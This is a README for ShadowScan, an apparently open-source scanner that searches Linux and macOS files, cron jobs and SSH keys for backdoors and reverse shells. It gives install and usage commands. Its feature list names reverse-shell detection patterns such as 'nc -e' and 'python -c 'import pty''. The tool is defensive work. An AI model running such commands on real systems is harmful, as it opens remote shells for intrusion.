ShadowScan is a security tool designed to scan files and system configurations for hidden backdoors, malicious scripts, and reverse shells on Linux and macOS.
ShadowScan is an open-source cybersecurity tool built for penetration testers, system administrators, and security researchers. It performs a deep scan of system files, looking for patterns commonly used in backdoors, malware, and reverse shells. The tool is optimized for Linux distributions (Arch, Debian, Ubuntu, Fedora, etc.) and macOS, making it a lightweight but powerful security solution.
✔ Detects hidden backdoors in shell scripts (.bashrc, .bash_profile, cron jobs).
✔ Scans for reverse shells, common obfuscation techniques, and suspicious commands (nc -e, python -c 'import pty').
✔ Integrates with VirusTotal and other threat intelligence APIs for checking unknown binaries.
✔ Identifies unauthorized SSH keys and altered system configurations.
✔ Creates a detailed security report highlighting the most critical findings.
- Clone the repository:
git clone https://github.com/yourusername/ShadowScan.git cd ShadowScan
- Install dependencies:
pip install -r requirements.txt
python src/shadowscan.py --scan /path/to/directory
python src/shadowscan.py --scan /path/to/directory --virustotal YOUR_API_KEY
python src/shadowscan.py --scan /path/to/directory --report output.json
- Fork the repository.
- Create a new branch.
- Commit your changes.
- Submit a pull request.
ShadowScan is licensed under the BSD 3-clause